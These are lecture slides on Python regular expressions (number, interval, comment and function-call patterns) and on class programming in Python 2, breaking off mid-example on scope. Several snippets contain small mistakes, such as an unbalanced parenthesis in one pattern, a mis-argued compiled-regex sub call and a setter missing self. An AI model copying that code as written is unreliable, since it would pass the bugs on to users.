    Regex for decimal notation:
    -?\d*\.\d+
    
    # or equivalently (\d is [0-9])
    -?[0-9]*\.[0-9]+
    
    Problem: this regex does not match '3.'
    The fix
    -?\d*\.\d*
    
    is ok but matches text like '-.' and (much worse!) '.'
    Trying it on
    'some text. 4. is a number.'
    
    gives a match for the first period!



    Fix of decimal notation regex

    We need a digit before OR after the dot
    The fix:
    -?(\d*\.\d+|\d+\.\d*)   
    
    A more compact version (just "OR-ing" numbers without digits after the dot):
    -?(\d*\.\d+|\d+\.)
    



    Combining regular expressions

    Make a regex for integer or decimal notation:
    (integer OR decimal notation)
    
    using the OR operator and parenthesis:
    -?(\d+|(\d+\.\d*|\d*\.\d+))
    
    Problem: 22.432 gives a match for 22
    (i.e., just digits? yes - 22 - match!)



    Check the order in combinations!

    Remedy: test for the most complicated pattern first
    (decimal notation OR integer)
    
    -?((\d+\.\d*|\d*\.\d+)|\d+)
    
    Modularize the regex:
    real_in = r'\d+'
    real_dn = r'(\d+\.\d*|\d*\.\d+)'
    real = '-?(' + real_dn + '|' + real_in + ')'
    



    Scientific notation regex (1)

    Write a regex for numbers in scientific notation
    Typical text: 1.27635E+01, -1.27635e+1
    Regular expression:
    -?\d\.\d+[Ee][+\-]\d\d?
    
    = optional minus, one digit, dot, at least one digit, E or e, plus or minus, one digit, optional digit



    Scientific notation regex (2)

    Problem: 1e+00 and 1e1 are not handled
    Remedy: zero or more digits behind the dot, optional e/E, optional sign in exponent, more digits in the exponent (1e001):
    -?\d\.?\d*[Ee][+\-]?\d+
    



    Making the regex more compact

    A pattern for integer or decimal notation:
    -?((\d+\.\d*|\d*\.\d+)|\d+)
    
    Can get rid of an OR by allowing the dot and digits behind the dot be optional:
    -?(\d+(\.\d*)?|\d*\.\d+)
    
    Such a number, followed by an optional exponent (a la e+02), makes up a general real number (!)
    -?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?
    



    A more readable regex

    Scientific OR decimal OR integer notation:
    -?(\d\.?\d*[Ee][+\-]?\d+|(\d+\.\d*|\d*\.\d+)|\d+)
    
    or better (modularized):
    real_in = r'\d+'
    real_dn = r'(\d+\.\d*|\d*\.\d+)'
    real_sn = r'(\d\.?\d*[Ee][+\-]?\d+'
    real = '-?(' + real_sn + '|' + real_dn + '|' + real_in + ')'
    
    Note: first test on the most complicated regex in OR expressions



    Groups (in introductory example)

    Enclose parts of a regex in () to extract the parts:
    pattern = r"t=(.*)\s+a:.*\s+(\d+)\s+.*=(.*)"
    # groups:     (  )          (   )      (  )
    
    This defines three groups (t, iterations, eps)
    In Python code:
    match = re.search(pattern, line)
    if match:
        time = float(match.group(1))
        iter = int  (match.group(2))
        eps  = float(match.group(3))
    
    The complete match is group 0 (here: the whole line)



    Regex for an interval

    Aim: extract lower and upper limits of an interval:
    [ -3.14E+00, 29.6524]
    
    Structure: bracket, real number, comma, real number, bracket, with embedded whitespace



    Easy start: integer limits

    Regex for real numbers is a bit complicated
    Simpler: integer limits
    pattern = r'\[\d+,\d+\]'
    
    but this does must be fixed for embedded white space or negative numbers a la
    [ -3   , 29  ]
    
    Remedy:
    pattern = r'\[\s*-?\d+\s*,\s*-?\d+\s*\]'
    
    Introduce groups to extract lower and upper limit:
    pattern = r'\[\s*(-?\d+)\s*,\s*(-?\d+)\s*\]'
    



    Testing groups

    In an interactive Python shell we write
    >>> pattern = r'\[\s*(-?\d+)\s*,\s*(-?\d+)\s*\]'
    >>> s = "here is an interval: [ -3, 100] ..."
    >>> m = re.search(pattern, s)
    >>> m.group(0)
    [ -3, 100]
    >>> m.group(1)
    -3
    >>> m.group(2)
    100
    >>> m.groups()   # tuple of all groups
    ('-3', '100')
    



    Named groups

    Many groups? inserting a group in the middle changes other group numbers...
    Groups can be given logical names instead
    Standard group notation for interval:
    # apply integer limits for simplicity: [int,int]
    \[\s*(-?\d+)\s*,\s*(-?\d+)\s*\]
    
    Using named groups:
    \[\s*(?P<lower>-?\d+)\s*,\s*(?P<upper>-?\d+)\s*\]
    
    Extract groups by their names:
    match.group('lower')
    match.group('upper')
    



    Regex for an interval; real limits

    Interval with general real numbers:
    real_short = r'\s*(-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)\s*'
    interval = r"\[" + real_short + "," + real_short + r"\]"
    
    Example:
    >>> m = re.search(interval, '[-100,2.0e-1]')
    >>> m.groups()
    ('-100', '100', None, None, '2.0e-1', '2.0', '.0', 'e-1')
    
    i.e., lots of (nested) groups; only group 1 and 5 are of interest



    Handle nested groups with named groups

    Real limits, previous regex resulted in the groups
    ('-100', '100', None, None, '2.0e-1', '2.0', '.0', 'e-1')
    
    Downside: many groups, difficult to count right
    Remedy 1: use named groups for the outer left and outer right groups:
    real1 = \
     r"\s*(?P<lower>-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)\s*"
    real2 = \
     r"\s*(?P<upper>-?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)\s*"
    interval = r"\[" + real1 + "," + real2 + r"\]"
    ...
    match = re.search(interval, some_text)
    if match:
        lower_limit = float(match.group('lower'))
        upper_limit = float(match.group('upper'))
    



    Simplify regex to avoid nested groups

    Remedy 2: reduce the use of groups
    Avoid nested OR expressions (recall our first tries):
    real_sn = r"-?\d\.?\d*[Ee][+\-]\d+"
    real_dn = r"-?\d*\.\d*"
    real = r"\s*(" + real_sn + "|" + real_dn + "|" + real_in + r")\s*"
    interval = r"\[" + real + "," + real + r"\]"
    

  • Cost: (slightly) less general and safe regex



    Extracting multiple matches (1)

    re.findall finds all matches (re.search finds the first)
    >>> r = r"\d+\.\d*"
    >>> s = "3.29 is a number, 4.2 and 0.5 too"
    >>> re.findall(r,s)
    ['3.29', '4.2', '0.5']
    
    Application to the interval example:
    lower, upper = re.findall(real, '[-3, 9.87E+02]')
    # real: regex for real number with only one group!
    



    Extracting multiple matches (1)

    If the regex contains groups, re.findall returns the matches of all groups - this might be confusing!
    >>> r = r"(\d+)\.\d*"
    >>> s = "3.29 is a number, 4.2 and 0.5 too"
    >>> re.findall(r,s)
    ['3', '4', '0']
    
    Application to the interval example:
    >>> real_short = r"([+\-]?(\d+(\.\d*)?|\d*\.\d+)([eE][+\-]?\d+)?)"
    >>> # recall: real_short contains many nested groups!
    >>> g = re.findall(real_short, '[-3, 9.87E+02]')
    >>> g
    [('-3', '3', '', ''), ('9.87E+02', '9.87', '.87', 'E+02')]
    >>> limits = [ float(g1) for g1, g2, g3, g4 in g ]
    >>> limits
    [-3.0, 987.0]
    



    Making a regex simpler

    Regex is often a question of structure and context
    Simpler regex for extracting interval limits:
    \[(.*),(.*)\]
    
    It works!
    >>> l = re.search(r'\[(.*),(.*)\]', 
                      ' [-3.2E+01,0.11  ]').groups()
    >>> l
    ('-3.2E+01', '0.11  ')
    
    # transform to real numbers:
    >>> r = [float(x) for x in l]
    >>> r
    [-32.0, 0.11]
    



    Failure of a simple regex (1)

    Let us test the simple regex on a more complicated text:
    >>> l = re.search(r'\[(.*),(.*)\]', \
        ' [-3.2E+01,0.11  ] and [-4,8]').groups()
    >>> l
    ('-3.2E+01,0.11  ] and [-4', '8')
    
    Regular expressions can surprise you...!
    Regular expressions are greedy, they attempt to find the longest possible match, here from [ to the last (!) comma
    We want a shortest possible match, up to the first comma, i.e., a non-greedy match
    Add a ? to get a non-greedy match:
    \[(.*?),(.*?)\]
    
    Now l becomes
    ('-3.2E+01', '0.11  ')
    



    Failure of a simple regex (2)

    Instead of using a non-greedy match, we can use
    \[([^,]*),([^\]]*)\]
    
    Note: only the first group (here first interval) is found by re.search, use re.findall to find all



    Failure of a simple regex (3)

    The simple regexes
    \[([^,]*),([^\]]*)\]
    \[(.*?),(.*?)\]
    
    are not fool-proof:
    >>> l = re.search(r'\[([^,]*),([^\]]*)\]', 
                      ' [e.g., exception]').groups()
    >>> l
    ('e.g.', ' exception')
    
    100 percent reliable fix: use the detailed real number regex inside the parenthesis
    The simple regex is ok for personal code



    Application example

    Suppose we, in an input file to a simulator, can specify a grid using this syntax:
    domain=[0,1]x[0,2] indices=[1:21]x[0:100]
    domain=[0,15] indices=[1:61]
    domain=[0,1]x[0,1]x[0,1] indices=[0:10]x[0:10]x[0:20]
    
    Can we easily extract domain and indices limits and store them in variables?



    Extracting the limits

    Specify a regex for an interval with real number limits
    Use re.findall to extract multiple intervals
    Problems: many nested groups due to complicated real number specifications
    Various remedies: as in the interval examples, see fdmgrid.py
    The bottom line: a very simple regex, utilizing the surrounding structure, works well



    Utilizing the surrounding structure

    We can get away with a simple regex, because of the surrounding structure of the text:
    indices = r"\[([^:,]*):([^\]]*)\]"  # works
    domain  = r"\[([^,]*),([^\]]*)\]"   # works
    
    Note: these ones do not work:
    indices = r"\[([^:]*):([^\]]*)\]" 
    indices = r"\[(.*?):(.*?)\]" 
    
    They match too much:
    domain=[0,1]x[0,2] indices=[1:21]x[1:101]
           [.....................:
    
    we need to exclude commas (i.e. left bracket, anything but comma or colon, colon, anythin but right bracket)



    Splitting text

    Split a string into words:
    line.split(splitstring)
    # or
    string.split(line, splitstring)
    
    Split wrt a regular expression:
    >>> files = "case1.ps, case2.ps,    case3.ps"
    >>> import re
    >>> re.split(r",\s*", files)
    ['case1.ps', 'case2.ps', 'case3.ps']
    
    >>> files.split(", ")  # a straight string split is undesired
    ['case1.ps', 'case2.ps', '   case3.ps']
    >>> re.split(r"\s+", "some    words   in a text")
    ['some', 'words', 'in', 'a', 'text']
    
    Notice the effect of this:
    >>> re.split(r" ", "some    words   in a text")
    ['some', '', '', '', 'words', '', '',  'in', 'a', 'text']
    



    Pattern-matching modifiers (1)

    ...also called flags in Python regex documentation
    Check if a user has written "yes" as answer:
    if re.search('yes', answer):
    
    Problem: "YES" is not recognized; try a fix
    if re.search(r'(yes|YES)', answer):
    
    Should allow "Yes" and "YEs" too...
    if re.search(r'[yY][eE][sS]', answer):
    
    This is hard to read and case-insensitive matches occur frequently - there must be a better way!



    Pattern-matching modifiers (2)

    if re.search('yes', answer,  re.IGNORECASE):
    # pattern-matching modifier: re.IGNORECASE
    # now we get a match for 'yes', 'YES', 'Yes' ...
    
    # ignore case:
    re.I  or  re.IGNORECASE
    
    # let ^ and $ match at the beginning and 
    # end of every line:
    re.M  or  re.MULTILINE
    
    # allow comments and white space:                            
    re.X  or  re.VERBOSE
    
    # let . (dot) match newline too:
    re.S  or  re.DOTALL
    
    # let e.g. \w match special chars (å, æ, ...):
    re.L  or  re.LOCALE
    



    Comments in a regex

    The re.X or re.VERBOSE modifier is very useful for inserting comments explaning various parts of a regular expression
    Example:
    # real number in scientific notation:
    real_sn = r"""
    -?              # optional minus
    \d\.\d+          # a number like 1.4098
    [Ee][+\-]\d\d?  # exponent, E-03, e-3, E+12
    """
    
    match = re.search(real_sn, 'text with a=1.92E-04 ',
                      re.VERBOSE)
    
    # or when using compile:
    c = re.compile(real_sn, re.VERBOSE)
    match = c.search('text with a=1.9672E-04 ')
    



    Substitution

    Substitute float by double:
    # filestr contains a file as a string
    filestr = re.sub('float', 'double', filestr)
    
    In general:
    re.sub(pattern, replacement, str)
    
    If there are groups in pattern, these are accessed by
    \1     \2     \3     ...
    \g<1>  \g<2>  \g<3>  ...
    
    \g<lower>  \g<upper> ...
    
    in replacement



    Example: strip away C-style comments

    C-style comments could be nice to have in scripts for commenting out large portions of the code:
    /*
    while 1:
        line = file.readline()
        ...
    ...
    */
    
    Write a script that strips C-style comments away
    Idea: match comment, substitute by an empty string



    Trying to do something simple

    Suggested regex for C-style comments:
    comment = r'/\*.*\*/'
    
    # read file into string filestr
    filestr = re.sub(comment, '', filestr)
    
    i.e., match everything between /* and */
    Bad: . does not match newline
    Fix: re.S or re.DOTALL modifier makes . match newline:
    comment = r'/\*.*\*/'
    c_comment = re.compile(comment, re.DOTALL)
    filestr = c_comment.sub(comment, '', filestr)
    
    OK? No!



    Testing the C-comment regex (1)

    Test file:
    /********************************************/
    /* File myheader.h                          */
    /********************************************/
    
    #include <stuff.h>  // useful stuff
    
    class MyClass
    {
      /* int r; */  float q;
      // here goes the rest class declaration
    }
    
    /* LOG HISTORY of this file:
     * $ Log: somefile,v $
     * Revision 1.2  2000/07/25 09:01:40  hpl
     * update
     *
     * Revision 1.1.1.1  2000/03/29 07:46:07  hpl
     * register new files
     *
    */
    



    Testing the C-comment regex (2)

    The regex
    /\*.*\*/  with re.DOTALL (re.S)
    
    matches the whole file (i.e., the whole file is stripped away!)
    Why? a regex is by default greedy, it tries the longest possible match, here the whole file
    A question mark makes the regex non-greedy:
    /\*.*?\*/
    



    Testing the C-comment regex (3)

    The non-greedy version works
    OK? Yes - the job is done, almost...
    const char* str ="/* this is a comment */"
    
    gets stripped away to an empty string...



    Substitution example

    Suppose you have written a C library which has many users
    One day you decide that the function
    void superLibFunc(char* method, float x)
    
    would be more natural to use if its arguments were swapped:
    void superLibFunc(float x, char* method)
    
    All users of your library must then update their application codes - can you automate?



    Substitution with backreferences

    You want locate all strings on the form
    superLibFunc(arg1, arg2)
    
    and transform them to
    superLibFunc(arg2, arg1)
    
    Let arg1 and arg2 be groups in the regex for the superLibFunc calls
    Write out
    superLibFunc(\2, \1)
    
    # recall: \1 is group 1, \2 is group 2 in a re.sub command
    



    Regex for the function calls (1)

    Basic structure of the regex of calls:
    superLibFunc\s*\(\s*arg1\s*,\s*arg2\s*\)
    
    but what should the arg1 and arg2 patterns look like?
    Natural start: arg1 and arg2 are valid C variable names
    arg = r"[A-Za-z_0-9]+"
    
    Fix; digits are not allowed as the first character:
    arg = "[A-Za-z_][A-Za-z_0-9]*"
    



    Regex for the function calls (2)

    The regex
    arg = "[A-Za-z_][A-Za-z_0-9]*"
    
    works well for calls with variables, but we can call superLibFunc with numbers too:
    superLibFunc ("relaxation", 1.432E-02);
    
    Possible fix:
    arg = r"[A-Za-z0-9_.\-+\"]+"
    
    but the disadvantage is that arg now also matches
    .+-32skj  3.ejks
    



    Constructing a precise regex (1)

    Since arg2 is a float we can make a precise regex: legal C variable name OR legal real variable format
    arg2 = r"([A-Za-z_][A-Za-z_0-9]*|" + real + \
            "|float\s+[A-Za-z_][A-Za-z_0-9]*" + ")"
    
    where real is our regex for formatted real numbers:
    real_in = r"-?\d+"
    real_sn = r"-?\d\.\d+[Ee][+\-]\d\d?"
    real_dn = r"-?\d*\.\d+"
    real = r"\s*("+ real_sn +"|"+ real_dn +"|"+ real_in +r")\s*"
    



    Constructing a precise regex (2)

    We can now treat variables and numbers in calls
    Another problem: should swap arguments in a user's definition of the function:
    void superLibFunc(char* method, float x)
    
    to 
    
    void superLibFunc(float x, char* method)
    
    Note: the argument names (x and method) can also be omitted!
    Calls and declarations of superLibFunc can be written on more than one line and with embedded C comments!
    Giving up?



    A simple regex may be sufficient

    Instead of trying to make a precise regex, let us make a very simple one:
    arg = '.+'   # any text
    
    "Any text" may be precise enough since we have the surrounding structure,
    superLibFunc\s*(\s*arg\s*,\s*arg\s*)
    
    and assume that a C compiler has checked that arg is a valid C code text in this context



    Refining the simple regex

    A problem with .+ appears in lines with more than one calls:
    superLibFunc(a,x);  superLibFunc(ppp,qqq);
    
    We get a match for the first argument equal to
    a,x);  superLibFunc(ppp
    
    Remedy: non-greedy regex (see later) or
    arg = r"[^,]+"
    
    This one matches multi-line calls/declarations, also with embedded comments (.+ does not match newline unless the re.S modifier is used)



    Swapping of the arguments

    Central code statements:
    arg = r"[^,]+"
    call = r"superLibFunc\s*\(\s*(%s),\s*(%s)\)" % (arg,arg)
    
    # load file into filestr
    
    # substutite:
    filestr = re.sub(call, r"superLibFunc(\2, \1)", filestr)
    
    # write out file again
    fileobject.write(filestr)
    
    Files: src/py/intro/swap1.py



    Testing the code

    Test text:
    superLibFunc(a,x);  superLibFunc(qqq,ppp);
    superLibFunc ( method1, method2 );
    superLibFunc(3method /* illegal name! */, method2 ) ;  
    superLibFunc(  _method1,method_2) ;
    superLibFunc (
                  method1 /* the first method we have */ ,
              super_method4 /* a special method that
                                   deserves a two-line comment... */
                 ) ;
    
    The simple regex successfully transforms this into
    superLibFunc(x, a);  superLibFunc(ppp, qqq);
    superLibFunc(method2 , method1);
    superLibFunc(method2 , 3method /* illegal name! */) ;  
    superLibFunc(method_2, _method1) ;
    superLibFunc(super_method4 /* a special method that
                                   deserves a two-line comment... */
                 , method1 /* the first method we have */ ) ;
    
    Notice how powerful a small regex can be!!
    Downside: cannot handle a function call as argument



    Shortcomings

    The simple regex
    [^,]+
    
    breaks down for comments with comma(s) and function calls as arguments, e.g.,
    superLibFunc(m1, a /* large, random number */);
    superLibFunc(m1, generate(c, q2));
    
    The regex will match the longest possible string ending with a comma, in the first line
    m1, a /* large,
    
    but then there are no more commas ...
    A complete solution should parse the C code



    More easy-to-read regex

    The superLibFunc call with comments and named groups:
    call = re.compile(r"""
         superLibFunc  # name of function to match 
         \s*           # possible whitespace
         \(            # parenthesis before argument list
         \s*           # possible whitespace
         (?P<arg1>%s)  # first argument plus optional whitespace
         ,             # comma between the arguments
         \s*           # possible whitespace
         (?P<arg2>%s)  # second argument plus optional whitespace
         \)            # closing parenthesis
         """ % (arg,arg), re.VERBOSE)
    
    # the substitution command:
    filestr = call.sub(r"superLibFunc(\g<arg2>, 
                       \g<arg1>)",filestr)
    
    Files: src/py/intro/swap2.py



    Example

    Goal: remove C++/Java comments from source codes
    Load a source code file into a string:
    filestr = open(somefile, 'r').read()
    
    # note: newlines are a part of filestr
    
    Substitute comments // some text... by an empty string:
    filestr = re.sub(r'//.*', '', filestr)
    
    Note: . (dot) does not match newline; if it did, we would need to say
    filestr = re.sub(r'//[^\n]*', '', filestr)
    



    Failure of a simple regex

    How will the substitution
    filestr = re.sub(r'//[^\n]*', '', filestr)
    
    treat a line like
    const char* heading = "------------//------------";
    
    ???



    Regex debugging (1)

    The following useful function demonstrate how to extract matches, groups etc. for examination:
    def debugregex(pattern, str):
        s = "does '" + pattern + "' match '" + str + "'?\n"
        match = re.search(pattern, str)
        if match:
            s += str[:match.start()] + "[" + \
                 str[match.start():match.end()] + \
                 "]" + str[match.end():]
            if len(match.groups()) > 0:
                for i in range(len(match.groups())):
                    s += "\ngroup %d: [%s]" % \
                         (i+1,match.groups()[i])
        else:
            s += "No match"
        return s
    



    Regex debugging (2)

    Example on usage:
    >>> print debugregex(r"(\d+\.\d*)",
                         "a= 51.243 and b =1.45")
    
    does '(\d+\.\d*)' match 'a= 51.243 and b =1.45'?
    a= [51.243] and b =1.45
    group 1: [51.243]
    





    Class programming in Python




    Contents

    Intro to the class syntax
    Special attributes
    Special methods
    Classic classes, new-style classes
    Static data, static functions
    Properties
    About scope



    More info

    Ch. 8.6 in the course book
    Python Tutorial
    Python Reference Manual (special methods in 3.3)
    Python in a Nutshell (OOP chapter - recommended!)



    Classes in Python

    Similar class concept as in Java and C++
    All functions are virtual
    No private/protected variables
    (the effect can be "simulated")
    Single and multiple inheritance
    Everything in Python is a class and works with classes
    Class programming is easier and faster than in C++ and Java (?)



    The basics of Python classes

    Declare a base class MyBase:
    class MyBase:
    
        def __init__(self,i,j):  # constructor
            self.i = i; self.j = j
    
        def write(self):         # member function
            print 'MyBase: i=',self.i,'j=',self.j
    
    self is a reference to this object
    Data members are prefixed by self:
    self.i, self.j
    All functions take self as first argument in the declaration, but not in the call
    inst1 = MyBase(6,9); inst1.write()
    



    Implementing a subclass

    Class MySub is a subclass of MyBase:
    class MySub(MyBase):
    
        def __init__(self,i,j,k):  # constructor
            MyBase.__init__(self,i,j)
            self.k = k;
     
       def write(self):
            print 'MySub: i=',self.i,'j=',self.j,'k=',self.k
    
    Example:
    # this function works with any object that has a write func:
    def write(v): v.write()
    
    # make a MySub instance
    i = MySub(7,8,9)
    
    write(i)   # will call MySub's write
    



    Comment on object-orientation

    Consider
    def write(v): 
        v.write()
    
    write(i)   # i is MySub instance
    
    In C++/Java we would declare v as a MyBase reference and rely on i.write() as calling the virtual function write in MySub
    The same works in Python, but we do not need inheritance and virtual functions here: v.write() will work for any object v that has a callable attribute write that takes no arguments
    Object-orientation in C++/Java for parameterizing types is not needed in Python since variables are not declared with types



    Private/non-public data

    There is no technical way of preventing users from manipulating data and methods in an object
    Convention: attributes and methods starting with an underscore are treated as non-public (``protected'')
    Names starting with a double underscore are considered strictly private (Python mangles class name with method name in this case: obj.__some has actually the name _obj__some)
    class MyClass:
        def __init__(self):
            self._a = False    # non-public
            self.b = 0         # public
            self.__c = 0       # private
    



    Special attributes

    i1 is MyBase, i2 is MySub

    Dictionary of user-defined attributes:
    >>> i1.__dict__  # dictionary of user-defined attributes
    {'i': 5, 'j': 7}
    >>> i2.__dict__
    {'i': 7, 'k': 9, 'j': 8}
    
    Name of class, name of method:
    >>> i2.__class__.__name__ # name of class
    'MySub'
    >>> i2.write.__name__     # name of method
    'write'
    
    List names of all methods and attributes:
    >>> dir(i2)
    ['__doc__', '__init__', '__module__', 'i', 'j', 'k', 'write']
    



    Testing on the class type

    Use isinstance for testing class type:
    if isinstance(i2, MySub):
        # treat i2 as a MySub instance
    
    Can test if a class is a subclass of another:
    if issubclass(MySub, MyBase):
        ...
    
    Can test if two objects are of the same class:
    if inst1.__class__ is inst2.__class__
    
    (is checks object identity, == checks for equal contents)
    a.__class__ refers the class object of instance a



    Creating attributes on the fly

    Attributes can be added at run time (!)
    >>> class G: pass
    
    >>> g = G()
    >>> dir(g)
    ['__doc__', '__module__']  # no user-defined attributes
    
    >>> # add instance attributes:
    >>> g.xmin=0; g.xmax=4; g.ymin=0; g.ymax=1
    >>> dir(g)
    ['__doc__', '__module__', 'xmax', 'xmin', 'ymax', 'ymin']
    >>> g.xmin, g.xmax, g.ymin, g.ymax
    (0, 4, 0, 1)
    
    >>> # add static variables:
    >>> G.xmin=0; G.xmax=2; G.ymin=-1; G.ymax=1
    >>> g2 = G()
    >>> g2.xmin, g2.xmax, g2.ymin, g2.ymax  # static variables
    (0, 2, -1, 1)
    



    Another way of adding new attributes

    Can work with __dict__ directly:
    >>> i2.__dict__['q'] = 'some string'
    >>> i2.q
    'some string'
    >>> dir(i2)
    ['__doc__', '__init__', '__module__', 
     'i', 'j', 'k', 'q', 'write']
    



    Special methods

    Special methods have leading and trailing double underscores (e.g. __str__)
    Here are some operations defined by special methods:
    len(a)            # a.__len__()
    c = a*b           # c = a.__mul__(b)
    a = a+b           # a = a.__add__(b)
    a += c            # a.__iadd__(c)
    d = a[3]          # d = a.__getitem__(3)
    a[3] = 0          # a.__setitem__(3, 0)
    f = a(1.2, True)  # f = a.__call__(1.2, True)
    if a:             # if a.__len__()>0: or if a.__nonzero():
    



    Example: functions with extra parameters

    Suppose we need a function of x and y with three additional parameters a, b, and c:
    def f(x, y, a, b, c):
        return a + b*x + c*y*y
    
    Suppose we need to send this function to another function
    def gridvalues(func, xcoor, ycoor, file):
        for i in range(len(xcoor)):
            for j in range(len(ycoor)):
                f = func(xcoor[i], ycoor[j])
                file.write('%g %g %g\n' % (xcoor[i], ycoor[j], f)
    
    func is expected to be a function of x and y only (many libraries need to make such assumptions!)
    How can we send our f function to gridvalues?



    Possible (inferior) solutions

    Solution 1: global parameters
    global a, b, c
    ...
    def f(x, y):
        return a + b*x + c*y*y
    
    ...
    a = 0.5;  b = 1;  c = 0.01
    gridvalues(f, xcoor, ycoor, somefile)
    
    Global variables are usually considered evil
    Solution 2: keyword arguments for parameters
    def f(x, y, a=0.5, b=1, c=0.01):
        return a + b*x + c*y*y
    
    ...
    gridvalues(f, xcoor, ycoor, somefile)
    
    useless for other values of a, b, c



    Solution: class with call operator

    Make a class with function behavior instead of a pure function
    The parameters are class attributes
    Class instances can be called as ordinary functions, now with x and y as the only formal arguments
    class F:
        def __init__(self, a=1, b=1, c=1):
            self.a = a;  self.b = b;  self.c = c
    
        def __call__(self, x, y):    # special method!
            return self.a + self.b*x + self.c*y*y
    
    f = F(a=0.5, c=0.01)
    # can now call f as
    v = f(0.1, 2)
    ...
    gridvalues(f, xcoor, ycoor, somefile)
    



    Some special methods

    __init__(self [, args]): constructor
    __del__(self): destructor (seldom needed since Python offers automatic garbage collection)
    __str__(self): string representation for pretty printing of the object (called by print or str)
    __repr__(self): string representation for initialization (a==eval(repr(a)) is true)



    Comparison, length, call

    __eq__(self, x): for equality (a==b), should return True or False
    __cmp__(self, x): for comparison (<, <=, >, >=, ==, !=); return negative integer, zero or positive integer if self is less than, equal or greater than x (resp.)
    __len__(self): length of object (called by len(x))
    __call__(self [, args]): calls like a(x,y) implies a.__call__(x,y)



    Indexing and slicing

    __getitem__(self, i): used for subscripting:
    b = a[i]
    __setitem__(self, i, v): used for subscripting: a[i] = v
    __delitem__(self, i): used for deleting: del a[i]
    These three functions are also used for slices:
    a[p:q:r] implies that i is a slice object with attributes start (p), stop (q) and step (r)
    b = a[:-1]
    # implies
    b = a.__getitem__(i)
    isinstance(i, slice) is True
    i.start is None
    i.stop  is -1
    i.step  is None
    



    Arithmetic operations

    __add__(self, b): used for self+b, i.e., x+y implies x.__add__(y)
    __sub__(self, b): self-b
    __mul__(self, b): self*b
    __div__(self, b): self/b
    __pow__(self, b): self**b or pow(self,b)



    In-place arithmetic operations

    __iadd__(self, b): self += b
    __isub__(self, b): self -= b
    __imul__(self, b): self *= b
    __idiv__(self, b): self /= b



    Right-operand arithmetics

    __radd__(self, b): This method defines b+self, while __add__(self, b) defines self+b. If a+b is encountered and a does not have an __add__ method, b.__radd__(a) is called if it exists (otherwise a+b is not defined).
    Similar methods: __rsub__, __rmul__, __rdiv__



    Type conversions

    __int__(self): conversion to integer
    (int(a) makes an a.__int__() call)
    __float__(self): conversion to float
    __hex__(self): conversion to hexadecimal number
    Documentation of special methods: see the Python Reference Manual (not the Python Library Reference!), follow link from index ``overloading - operator''



    Boolean evaluations

    if a:
    when is a evaluated as true?
    If a has __len__ or __nonzero__ and the return value is 0 or False, a evaluates to false
    Otherwise: a evaluates to true
    Implication: no implementation of __len__ or __nonzero__ implies that a evaluates to true!!
    while a follows (naturally) the same set-up



    Example on call operator: StringFunction

    Matlab has a nice feature: mathematical formulas, written as text, can be turned into callable functions
    A similar feature in Python would be like
    f = StringFunction_v1('1+sin(2*x)')
    print f(1.2)  # evaluates f(x) for x=1.2
    
    f(x) implies f.__call__(x)
    Implementation of class StringFunction_v1 is compact! (see next slide)



    Implementation of StringFunction classes

    Simple implementation:
    class StringFunction_v1:
        def __init__(self, expression):
            self._f = expression
    
        def __call__(self, x):
            return eval(self._f)  # evaluate function expression
    
    Problem: eval(string) is slow; should pre-compile expression
    class StringFunction_v2:
        def __init__(self, expression):
            self._f_compiled = compile(expression, 
                                       '<string>', 'eval')
    
        def __call__(self, x):
            return eval(self._f_compiled)
    



    New-style classes

    The class concept was redesigned in Python v2.2
    We have new-style (v2.2) and classic classes
    New-style classes add some convenient functionality to classic classes
    New-style classes must be derived from the object base class:
    class MyBase(object):
        # the rest of MyBase is as before
    



    Static data

    Static data (or class variables) are common to all instances
    >>> class Point:
    	counter = 0 # static variable, counts no of instances
    	def __init__(self, x, y):
    		self.x = x;  self.y = y;  
                    Point.counter += 1
    		
    >>> for i in range(1000):
    	p = Point(i*0.01, i*0.001)
    	
    >>> Point.counter     # access without instance
    1000
    >>> p.counter         # access through instance
    1000
    



    Static methods

    New-style classes allow static methods
    (methods that can be called without having an instance)
    class Point(object):
        _counter = 0
        def __init__(self, x, y):
    	self.x = x;  self.y = y;  Point._counter += 1
        def ncopies(): return Point._counter
        ncopies = staticmethod(ncopies)
    
    Calls:
    >>> Point.ncopies()
    0
    >>> p = Point(0, 0)
    >>> p.ncopies()
    1
    >>> Point.ncopies()
    1
    
    Cannot access self or class attributes in static methods



    Properties

    Python 2.3 introduced ``intelligent'' assignment operators, known as properties
    That is, assignment may imply a function call:
    x.data = mydata;     yourdata = x.data
    # can be made equivalent to
    x.set_data(mydata);  yourdata = x.get_data()
    
    Construction:
    class MyClass(object):   # new-style class required!
        ...
        def set_data(self, d):
            self._data = d
            <update other data structures if necessary...>
    
        def get_data(self):
            <perform actions if necessary...>
            return self._data
    
        data = property(fget=get_data, fset=set_data)
    



    Attribute access; traditional

  • Direct access:
    my_object.attr1 = True
    a = my_object.attr1
    

  • get/set functions:
    class A:
        def set_attr1(attr1):
            self._attr1 = attr # underscore => non-public variable
            self._update(self._attr1)  # update internal data too
        ...
    
    my_object.set_attr1(True)
    
    a = my_object.get_attr1()
    
    Tedious to write! Properties are simpler...



    Attribute access; recommended style

  • Use direct access if user is allowed to read and assign values to the attribute

  • Use properties to restrict access, with a corresponding underlying non-public class attribute

  • Use properties when assignment or reading requires a set of associated operations

  • Never use get/set functions explicitly
    myobj.compute_something()
    myobj.my_special_variable = yourobj.find_values(x,y)
    



    More about scope

    Example: a is global, local, and class attribute
    a = 1                 # global variable
    
    def f(x):
        a = 2             # local variable
    
    class B:
        def __init__(self):
            self.a = 3    # class attribute
    
        def scopes(self):
            a = 4         # local (method) variable
    
    Dictionaries with variable names as keys and variables as values:
    locals()    : local variables
    globals()   : global variables
    vars()      : local variables
    vars(self)  : class attributes
    



    Demonstration of scopes (1)

    Function scope:
    >>> a = 1
    >>> def f(x):
            a = 2             # local variable
            print 'locals:', locals(), 'local a:', a
            print 'global a:', globals()['a']
    
    >>> f(10)
    locals: {'a': 2, 'x': 10} local a: 2
    global a: 1
    
    a refers to local variable



    Demonstration of scopes (2)

    Class:
    class B:
        def __init__(self):
            self.a = 3    # class attribute
    
        def scopes(self):
            a = 4         # local (method) variable
    	print 'locals:', locals()
            print 'vars(self):', vars(self)
            print 'self.a:', self.a
    	print 'local a:', a, 'global a:', globals()['a']
    
    Interactive test:
    >>> b=B()
    >>> b.scopes()
    locals: {'a': 4, 'self': <scope.B instance at 0x4076fb4c>}
